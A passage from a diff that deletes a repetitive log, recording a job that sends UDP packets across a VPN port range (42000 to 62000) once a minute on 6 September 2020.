to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:50:05 -Starting port fill at 2020-09-06 09:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:51:05 -Starting port fill at 2020-09-06 09:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:52:05 -Starting port fill at 2020-09-06 09:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:53:05 -Starting port fill at 2020-09-06 09:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:54:05 -Starting port fill at 2020-09-06 09:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:55:04 -Starting port fill at 2020-09-06 09:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:56:06 -Starting port fill at 2020-09-06 09:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:57:05 -Starting port fill at 2020-09-06 09:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:58:05 -Starting port fill at 2020-09-06 09:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:59:04 -Starting port fill at 2020-09-06 10:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:00:04 -Starting port fill at 2020-09-06 10:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:01:06 -Starting port fill at 2020-09-06 10:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:02:04 -Starting port fill at 2020-09-06 10:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:03:04 -Starting port fill at 2020-09-06 10:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:04:04 -Starting port fill at 2020-09-06 10:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:05:04 -Starting port fill at 2020-09-06 10:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:06:05 -Starting port fill at 2020-09-06 10:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:07:05 -Starting port fill at 2020-09-06 10:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:08:05 -Starting port fill at 2020-09-06 10:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:09:05 -Starting port fill at 2020-09-06 10:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:10:06 -Starting port fill at 2020-09-06 10:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:11:07 -Starting port fill at 2020-09-06 10:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 